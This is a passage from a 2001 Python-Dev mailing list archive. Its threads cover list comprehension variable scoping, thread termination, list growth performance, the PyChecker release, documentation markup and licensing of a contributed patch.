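    get a backslash prefix; every other byte becomes a three-digit octal
    escape such as \\012, which octal-only tools understand.
    """
    out = []
    for byte in data:
        ch = chr(byte)
        if ch in '\\"':
            out.append('\\' + ch)          # escape the escape characters
        elif 0x20 <= byte < 0x7F:
            out.append(ch)                 # printable ASCII as-is
        else:
            out.append('\\%03o' % byte)    # e.g. newline -> \012
    return ''.join(out)


print(octal_escape(b'tab\there\n\xff'))  # prints: tab\011here\012\377
```

Because the escaping rules live in the helper rather than in repr(), the output stays the same across interpreter versions, which is the stability Robin's pipeline was implicitly relying on.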
From akuchlin at mems-exchange.org Tue May 29 16:04:37 2001 From: akuchlin at mems-exchange.org (Andrew Kuchling) Date: Tue, 29 May 2001 10:04:37 -0400 Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400 References: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us> On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote: > It looks like I never replied to this. It's probably dropped off >your radar, but I'd say the answer is that the files on parrot should >be discarded sooner rather than later -- when we actually manage to Done. Out of paranoia about doing 'rm -rf' within www.python.org's tree, the files aren't deleted; instead I just moved them to my home directory on parrot. --amk From aahz at rahul.net Tue May 29 17:47:13 2001 From: aahz at rahul.net (Aahz Maruch) Date: Tue, 29 May 2001 08:47:13 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 28, 2001 09:49:29 PM Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net> Tim Peters wrote: > > [Aahz] > > Futz. *Now* it works. > > Now *what* works? The test case I posted, or the original test case you > tried (which you didn't post)? My original test case. I didn't actually preserve it, so the code below was my attempt to reconstruct it (but I think it's pretty close to the test case I tried). Don't worry, if I run into this again, I'll be *much* more careful about preserving the evidence and fiddling with variations; last time I just assumed it was pilot error. 
    from threading import Thread
    import os

    class Foo(Thread):
        def run(self):
            while 1:
                pass

    f = Foo()
    f.start()
    os._exit(1)

From beazley at cs.uchicago.edu Tue May 29 18:56:09 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Tue, 29 May 2001 11:56:09 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> I'm not sure if this has ever been brought up before (I don't recall seeing it), but I would like to throw out something that has been bugging me about list comprehensions for quite some time... First of all, I have to say that I've really grown to like list comprehensions a lot. In fact, I find myself using them in just about every Python program I've been writing since switching to Python 2.0. However, I've also been shooting myself in the foot a little more than usual due to the following issue: When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x" is evaluated in the local scope (and replaces any previous binding to "x" that might have existed outside the context of the list comprehension). Because of this, I have frequently found myself debugging the following programming error:

    # Some loop
    for x in r:
        ...
        # bunch of statements
        ...
        s = [expr(x) for x in t]
        ...
        # Try to do something with x.
        # ???? What in the hell is wrong with my program ????
        ...

The main problem is that I conceptually tend to think of the list comprehension as being some kind of list operator where the index name is really one of the operands in some sense. Because of this, it is *VERY* easy to get in the habit of throwing list comprehensions all over the place, each of which uses a common index name like x,i,j, etc. Of course, this works just fine until you forget that you're also using x,i,j for some kind of loop variable someplace else :-).
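The pitfall described above is easy to reproduce. The sketch below runs under Python 3, which later gave list comprehensions their own scope, so it shows the contrast rather than the 2.1 behavior: an ordinary `for` loop still rebinds its target in the enclosing scope, while the comprehension's `x` no longer does. Under Python 2.1, `after_comprehension` would instead be 2. The function name `demo` is illustrative only.

```python
def demo():
    x = "outer"
    # An ordinary for loop rebinds the name in the enclosing scope.
    for x in range(3):
        pass
    after_loop = x            # now 2

    x = "outer"
    # Under Python 3 the comprehension's loop variable is local to the
    # comprehension, so the enclosing binding survives.
    squares = [x * x for x in range(3)]
    after_comprehension = x   # still "outer"
    return after_loop, squares, after_comprehension


print(demo())  # (2, [0, 1, 4], 'outer')
```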
Therefore, I'm wondering if it would make any sense to make the iterator variables used inside of a list comprehension private in some manner--either through name mangling or some other technique? For example:

    s = [expr(x) for x in t]

would get expanded into something roughly like this:

    s = [ ]
    for _mangled_x in t:
        s.append(expr(_mangled_x))
    del _mangled_x

Just as an aside, I have never intentionally used the iterator variable of a list comprehension after the operation has completed. I was actually quite surprised with this behavior the first time I saw it. I suspect most other programmers would not anticipate this side effect either. Comments? Cheers, Dave From nas at python.ca Tue May 29 19:01:41 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 29 May 2001 10:01:41 -0700 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529100141.B18974@glacier.fnational.com> David Beazley wrote: > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. I've been bitten by this one once. It took a while to figure out the problem. I'm not sure that we can change it now though. Neil From skip at pobox.com Tue May 29 21:03:47 2001 From: skip at pobox.com (Skip Montanaro) Date: Tue, 29 May 2001 14:03:47 -0500 Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd) Message-ID: <15123.62099.473259.545781@beluga.mojam.com> I pass this along in case anyone here has some ideas for Jeff about how to work around his problems with pyexpat.c. Skip -------------- next part -------------- An embedded message was scrubbed...
From: Jeff Rush Subject: [Stackless] Stackless for 2.1: Progress Report Date: Tue, 29 May 2001 13:06:12 -0500 Size: 3437 URL: From gward at python.net Tue May 29 23:21:55 2001 From: gward at python.net (Greg Ward) Date: Tue, 29 May 2001 17:21:55 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529172155.A8737@gerg.ca> On 29 May 2001, David Beazley said: > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner--either through name mangling or some other technique? For > example: Two ideas occur to me: * make the list comprehension a new scoping level, which of course is doable now that we have sensible scoping semantics. Presumably the usual warning message about shadowing variables from an outer scope will apply; you'll still have the bug in your code, but at least Python will tell you about it * don't make list comprehensions a separate scope, but add a little trickery so that something *like* the "shadowing variable from an outer scope" message is emitted Haven't really thought about backwards compatibility issues... Greg From paulp at ActiveState.com Tue May 29 23:55:03 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Tue, 29 May 2001 14:55:03 -0700 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) References: <20010529115201.J676@xs4all.nl> Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com> Thomas Wouters wrote: > > Robin apparently ran into a real problem caused by the change in string > repr() semantics. Now, arguably this is his own stupid fault (and > indeed he argues that himself) but that doesn't mean we shouldn't take this > into account. I think it is done now and it is better this way. The pain is over. 
Reverting would hurt someone else again. Displayhook should be used sparingly. One of the major virtues of the REPL is that it behaves so much like standard Python. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From tim at digicool.com Wed May 30 00:54:01 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 29 May 2001 18:54:01 -0400 Subject: [Python-Dev] Re: Time for the yearly list.append() panic Message-ID: FYI, I checked in a variation (listobject.c) over the weekend. Win9x is ultimately hopeless, but we can grow a list there to about 35M elements now instead of crapping out at < 2M, and it's zippy the whole way until death. Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was obvious very early there. Now it's flat and fast until physical RAM is exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize points. Fred kindly confirmed that Linux isn't hurt. Its behavior looks the same as the new Win2K behavior, except that the Linux hiccups are much briefer (although still obvious when they occur). time-for-the-yearly-list.append()-celebration-ly y'rs - tim From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: <3B145FC9.49813488@metaslash.com> I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. 
But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From fdrake at cj42289-a.reston1.va.home.com Wed May 30 07:31:01 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 01:31:01 -0400 (EDT) Subject: [Python-Dev] [development doc updates] 
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for development version of Python (2.2). Mostly small updates, but I've worked on new markup for grammar productions used in the Reference Manual. Currently, only the lexical productions in Chapter 2 of the manual have been converted to the new markup and layout. Please take a look and send comments to doc-sig at python.org; the first page containing these changes is at: http://python.sourceforge.net/devel-docs/ref/identifiers.html The changes needed to implement the markup have not been checked in yet, and there are some bugs in the implementation (both for HTML and PDF), but this should make the productions easier to navigate. I've tested the HTML version on Linux only with Mozilla 0.9, Opera 5.0b8, and Netscape Navigator 4.77. Navigator is definitely lagging behind in CSS support! Also added Michel Pelletier's documentation for the HTMLParser module, with some small changes. From tim.one at home.com Wed May 30 07:51:04 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 01:51:04 -0400 Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: [Fred Drake] > The development version of the documentation has been updated: > > http://python.sourceforge.net/devel-docs/ > > Incremental update for development version of Python (2.2). > > Mostly small updates, but I've worked on new markup for grammar > productions used in the Reference Manual. Currently, only the lexical > productions in Chapter 2 of the manual have been converted to the new > markup and layout.
Please take a look and send comments to > doc-sig at python.org; the first page containing these changes is at: > > http://python.sourceforge.net/devel-docs/ref/identifiers.html > > The changes needed to implement the markup have not been checked in > yet, and there are some bugs in the implementation (both for HTML and > PDF), but this should make the productions easier to navigate. Let me suggest starting with http://python.sourceforge.net/devel-docs/ref/integers.html instead, and clicking on "digit" in the "hexdigit" production. The problem with the originally suggested page is that all the links point into the same paragraph, so "nothing happens" when you click one. But "digit" was the cause of a bogus bug report, as the submitter didn't realize "digit" had been defined earlier in the docs, and without something like these mondo cool new links it's almost impossible to find cross-section production definitions. Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the node24.html page it refers to doesn't seem to exist. From fdrake at acm.org Wed May 30 07:53:23 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 01:53:23 -0400 (EDT) Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com> Tim Peters writes: > Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the > node24.html page it refers to doesn't seem to exist. That was the bug alluded to. The digit* grouped with the nonzerodigit also doesn't work, although the other two uses of digit on that page (floating.html) work properly. I'll investigate tomorrow; just too tired tonight. -Fred -- Fred L. Drake, Jr. 
PythonLabs at Digital Creations From tim.one at home.com Wed May 30 09:47:47 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 03:47:47 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley] > ... > However, I've also been shooting myself in the foot a little more > than usual > ... > Because of this, I have frequently found myself debugging the > following programming error: If "frequently" is "a little more than usual", then it sounds like your problems in all areas are too common for us to really help you by fixing this one . OK, I'm afraid the behavior follows from taking seriously the idea that listcomps are syntactic sugar for a specific pattern of nested loops and "if" tests. That was done to make it explainable, and the correspondence is indeed exact. The implementation already creates "invisible" names:

    >>> [repr(name) for name in globals().keys()]
    ["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
    >>>

Where did "_[1]" come from? You guessed it. Look for it after the listcomp finishes and it's gone:

    >>> globals().keys()
    ['__builtins__', '__name__', 'name', '__doc__']
    >>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent loop nest. > ... > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner I'm not sure it's worth losing the exact correspondence with nested loops; or that it's not worth it either. Note that "the iterator variables" needn't be bare names:

    >>> class x:
    ...     pass
    ...
    >>> [1 for x.i in range(3)]
    [1, 1, 1]
    >>> x.i
    2
    >>>

This complicates explaining exactly how you want to deviate from the for-loop model. So, I think, does this:

    >>> [i for i in range(2) for i in range(2, 5)]
    [2, 3, 4, 2, 3, 4]
    >>>

That is, even in simple cases, is the desired scope attached to the "for" or to the "[]"?
Python doesn't have a problem with reusing a name as a for target in nested loops (or in listcomps today). > ... > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. Not even in a debugger, when the operation has completed via unexpected exception, and you're desperate to know what the control vrbl was bound to at the time of death? Or in an exception handler?

    >>> import sys
    >>> try:
    ...     [i*i for i in xrange(sys.maxint)]
    ... except OverflowError:
    ...     raise OverflowError("oops! blew up at %d" % i)
    ...
    Traceback (most recent call last):
      File "<stdin>", line 4, in ?
    OverflowError: oops! blew up at 46341
    >>>

Or what about:

    i = 12
    def f():
        print i
        return [i for i in range(i)]
    f()

1. Should "print i" print 12, or raise UnboundLocalError?
2. Does the "i" in "range(i)" refer to the global i, or is that just senseless?

So long as the for-loop model is followed faithfully, nothing is hard to explain or predict, and simply because there's nothing truly new. > I was actually quite surprised with this behavior the first time I saw > it. Me too . > I suspect most other programmers would not anticipate this side > effect either. I share the suspicion, but am not sure why: "for" is a binding construct in Python, so being surprised by "for" binding a name is itself surprising. Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

    >>> i = 12
    >>> (lambda: [i**2 for i in range(4)])()
    [0, 1, 4, 9]
    >>> i
    12
    >>>

That's more like Haskell does it. But the day we explain a Python construct in terms of a lambda transformation is the day Guido kills all of us . From esr at thyrsus.com Wed May 30 10:00:56 2001 From: esr at thyrsus.com (Eric S.
Raymond) Date: Wed, 30 May 2001 04:00:56 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010530040056.A27662@thyrsus.com> Tim Peters : > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . They'll get *my* lambdas when they pry them from my cold, dead fingers , but I find I don't have a strong opinion about how the scoping should work. -- Eric S. Raymond "Experience should teach us to be most on our guard to protect liberty when the government's purposes are beneficient... The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well meaning but without understanding." -- Supreme Court Justice Louis Brandeis From thomas at xs4all.net Wed May 30 13:14:24 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 30 May 2001 13:14:24 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700 References: Message-ID: <20010530131424.Y690@xs4all.nl> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > OK, I'm un-withdrawing this patch. Just had to get things > straight with our lawyer. The patch is released under the > following license (the X11 license with 4 extra paragraphs > of disclaimers :): > http://www.zoteca.com/opensource/LICENSE.txt This raises an interesting point. Do we want separate pieces of the Python distribution to have separate licences ? I'd point out that the zoteca licence isn't mentioned on the OSI site as an Approved Licence, and that the licence contains a copyright notice, but no clear statement whether it's allowed to copy the licence other than together with the piece of software it's distributed with. 
The easiest solution would of course be for Itamar to get his boss/lawyers to give us the right to relicence it under the PSF licence :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From jack at oratrix.nl Wed May 30 14:26:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 30 May 2001 14:26:39 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: Message by Thomas Wouters , Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl> > On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > > > OK, I'm un-withdrawing this patch. Just had to get things > > straight with our lawyer. The patch is released under the > > following license (the X11 license with 4 extra paragraphs > > of disclaimers :): > > http://www.zoteca.com/opensource/LICENSE.txt > > [...] > > The easiest solution would of course be for Itamar to get his boss/lawyers > to give us the right to relicence it under the PSF licence :) I think this is the only viable solution. If various parts of Python have different license agreements this may well be a reason for people not to use Python because the hassle of figuring out which pieces fit their own licensing policy. 
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From beazley at cs.uchicago.edu Wed May 30 15:49:29 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Wed, 30 May 2001 08:49:29 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Tim Peters writes: > > Because of this, I have frequently found myself debugging the > > following programming error: > > If "frequently" is "a little more than usual", then it sounds like your > problems in all areas are too common for us to really help you by fixing > this one . I've probably been bitten by this about 5-10 times over the last few months. I can also say that it's a real bugger to track down when it happens. Now while this may just be a user problem on my part (which I can accept), I think there is a much deeper semantic problem with the current implementation of list comprehensions. Specifically, we now have this really cool list construction technique that is, for all practical purposes, an operator. Yet, at the same time, this "operator" has a really nasty side-effect of changing the values of variables in the surrounding scope in a very unnatural and unexpected way. More generally, it's essentially the same behavior that you would get if you wrote some code like this: a = expr(x,y) and expr() went off and nuked the value of x, replacing it with something completely different (note: I'm not talking about cases where x might be mutable here). Since you can write things like this a = [ 2*x for x in s] it's easy to view the right hand side as being isolated in the same way as a normal expression (where the name of the iteration variable "x" is incidental--a throwaway if you will). 
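The nested-loop reading that Tim describes earlier in the thread can be checked directly. This is a minimal sketch, assuming Python 3 (so the comprehension's own `i` stays local, unlike in 2.1); `Holder`, `comprehension_form` and `nested_loop_form` are illustrative names only. It also shows that a comprehension target need not be a bare name: an attribute target simply sets the attribute on an object that already exists.

```python
class Holder:
    """Plain object whose attribute serves as a comprehension target."""


def comprehension_form():
    # Tim's example: the same name is the target of both "for" clauses.
    return [i for i in range(2) for i in range(2, 5)]


def nested_loop_form():
    # The nested-loop reading of the comprehension above.
    result = []
    for i in range(2):
        for i in range(2, 5):
            result.append(i)
    return result


# An attribute target rebinds holder.i on each iteration.
holder = Holder()
ones = [1 for holder.i in range(3)]

print(comprehension_form())  # [2, 3, 4, 2, 3, 4]
print(nested_loop_form())    # [2, 3, 4, 2, 3, 4]
print(ones, holder.i)        # [1, 1, 1] 2
```

Both forms produce the same list because rebinding `i` in the inner loop never disturbs the outer loop's iterator; that exact correspondence is what Tim is reluctant to give up.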
Maybe everyone else views list comprehensions as a series of statements (the syntactic sugar for nested for-loop idea). However, if you look at how they can be used, it's completely different than this. Specifically, if I write something like this:

    a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into the following sequence of statements:

    t1 = [ ]
    for x in s:
        t1.append(2*x)
    t2 = [ ]
    for x in t:
        t2.append(3*x)
    a = t1 + t2

> > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 > >>> > Hmmm. I didn't realize that you could even do this. Yes, this would definitely present a problem. However, if list comprehensions were modified not to assign any names in the current scope, it still seems like this would work (in this case, "x" is already defined and "x.i" is not creating a new name, but is setting an attribute on something else). Couldn't nested scopes be used to implement this in some manner? > > ... > > Just as an aside, I have never intentionally used the iterator > > variable of a list comprehension after the operation has completed. > > Not even in a debugger, when the operation has completed via unexpected > exception, and you're desperate to know what the control vrbl was bound to > at the time of death? Or in an exception handler? > Nope. I don't make programming mistakes---well, other than this one, and well, all of those other ones :-). > Another principled model is possible, where > > [f(i) for i in whatever] > > is treated like > > (lambda: [f(i) for i in whatever])() > > >>> i = 12 > >>> (lambda: [i**2 for i in range(4)])() > [0, 1, 4, 9] > >>> i > 12 > >>> > > That's more like Haskell does it.
But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . Ah yes, well this is exactly the kind of behavior that seems most natural to me. It's also the behavior that everyone expected when I went around to the various Python hackers in the department and asked them about it yesterday. I suppose I could just write this: a = (lambda s: [2*i for i in s])(s) However, that's pretty ugly. In any case, I'm mostly just curious if anyone else has been bitten by the problem I've described. I would certainly love to see a fix for it (I would even volunteer to work on a prototype implementation if there is interest). On the other hand, if no changes are deemed necessary, we should at least try to better emphasize this behavior in the documentation--perhaps encouraging people to use private names. For example: a = [_i*2 for _i in t] (although, I have to say that this just looks like a gross hack--I'd rather not have to resort to doing this). Cheers, Dave From fdrake at acm.org Wed May 30 16:03:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 10:03:13 -0400 (EDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> David Beazley writes: > Maybe everyone else views list comprehensions as a series of > statements (the syntactic sugar for nested for-loop idea). However, I certainly don't. I know that that was used as part of the design consideration, but it's not at all clear to me that this is desirable.
If I see code like this: x = 42 L = [x**2 for x in range(2000)] print x I think it should map to something like this from C++: int x = 42; int L[2000]; for (int x = 0; x < 2000; ++x) { L[x] = x * x; } printf("%d\n", x); i.e., both *should* print "42\n" on standard output. Tim sez: > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 David: > Hmmm. I didn't realize that you could even do this. Yes, this would > definitely present a problem. However, if list comprehensions were I didn't realize this either. I'm quite surprised by it, in fact, though I understand (I think) why it works that way. But was this intentional? It seems like pure evil to me! I'd only expect it to support bare names and sequence unpacking (with only bare names at the "edge" of all nested unpackings). -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From gward at python.net Wed May 30 16:36:30 2001 From: gward at python.net (Greg Ward) Date: Wed, 30 May 2001 10:36:30 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <20010530103630.B11580@gerg.ca> On 30 May 2001, David Beazley said: > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. For the record, I have not been bitten by this, but I probably don't use list comps as much as you do. I can completely sympathize with both your and Tim's point of view here. Both make perfect sense at the same time. Hmmm. "Do I contradict myself? 
Very well then I contradict myself, (I am large, I contain multitudes)" Greg -- Greg Ward - Unix nerd gward at python.net http://starship.python.net/~gward/ Money is a powerful aphrodisiac. But flowers work almost as well. From barry at digicool.com Wed May 30 17:07:12 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 11:07:12 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading References: <20010530131424.Y690@xs4all.nl> <20010530122702.F3FE53B8999@snelboot.oratrix.nl> Message-ID: <15125.3232.925401.563151@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> The easiest solution would of course be for Itamar to get his TW> boss/lawyers to give us the right to relicence it under the TW> PSF licence :) >>>>> "JJ" == Jack Jansen writes: JJ> I think this is the only viable solution. If various parts of JJ> Python have different license agreements this may well be a JJ> reason for people not to use Python because the hassle of JJ> figuring out which pieces fit their own licensing policy. I completely agree. IMO, the most important job of the PSF is to make the Python IP sane again. That means clearing as much of the existing rights as possible, and releasing it under the NAIPL (New And Improved Python License). Any code that is licensed differently could mean that it'll be ripped out of some re-distributions. I'd be less concerned about some ancillary module that few people use, and much more concerned about some core piece of the code. -Barry From mal at lemburg.com Wed May 30 21:57:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 21:57:17 +0200 Subject: [Python-Dev] Autoconf problems on BeOS Message-ID: <3B15509D.C790D5DF@lemburg.com> I have a bug report assigned to myself which really is more about autoconf than Unicode. The problem is that the SIZEOF_xxx tests cause the Metroworks compiler on BeOS to fail and this again causes these defines to be set to 0 ! 
Could someone with more autoconf experience please have a look ? https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470 Thanks, -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Wed May 30 22:07:37 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:07:37 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> Message-ID: [Tim] > Note that "the iterator variables" needn't be bare names: [Fred] > I didn't realize this either. You have to get your head out of the docs and read more code . > I'm quite surprised by it, in fact, though I understand (I think) why > it works that way. But was this intentional? I expect so. > It seems like pure evil to me! Sometimes it's the bee's knees; for example, >>> digits = range(3) >>> x = [None] * 3 >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits] >>> base3 [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0], [0, 1, 1], [0, 1, 2], [0, 2, 0], [0, 2, 1], [0, 2, 2], [1, 0, 0], [1, 0, 1], [1, 0, 2], [1, 1, 0], [1, 1, 1], [1, 1, 2], [1, 2, 0], [1, 2, 1], [1, 2, 2], [2, 0, 0], [2, 0, 1], [2, 0, 2], [2, 1, 0], [2, 1, 1], [2, 1, 2], [2, 2, 0], [2, 2, 1], [2, 2, 2]] >>> I've done stuff "like that" often, albeit via the nested-loop spelling. > I'd only expect it to support bare names and sequence unpacking (with > only bare names at the "edge" of all nested unpackings). It's too late to take it away now! Python always worked this way. And it's really got nothing to do with implementing what David wants (e.g., the lambda transformation I mentioned preserves its semantics) -- apart from (I hope) driving home that changes need to be considered very carefully.
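A sketch for readers on a modern Python 3 interpreter, not the 2.x interpreter discussed in this thread. It checks Tim's subscription-target trick against a spelling with one fresh name per nesting level and against `itertools.product`, a standard-library function added after this thread and not mentioned in it. The names `base3_subscript`, `base3_names` and `base3_product` are illustrative only.

```python
from itertools import product

digits = range(3)

# Tim's trick: the loop targets are subscriptions x[0], x[1], x[2], so each
# iteration stores into the shared list x, and x[:] snapshots its contents.
x = [None] * 3
base3_subscript = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]

# The same enumeration with one fresh name per nesting level.
base3_names = [[a, b, c] for a in digits for b in digits for c in digits]

# itertools.product yields tuples in the same order (rightmost varies fastest).
base3_product = [list(t) for t in product(digits, repeat=3)]

print(len(base3_subscript), base3_subscript[:4])
# 27 [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0]]
```

Even in Python 3 the subscription targets write into the shared list `x`, so it is left holding `[2, 2, 2]` once the comprehension finishes.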
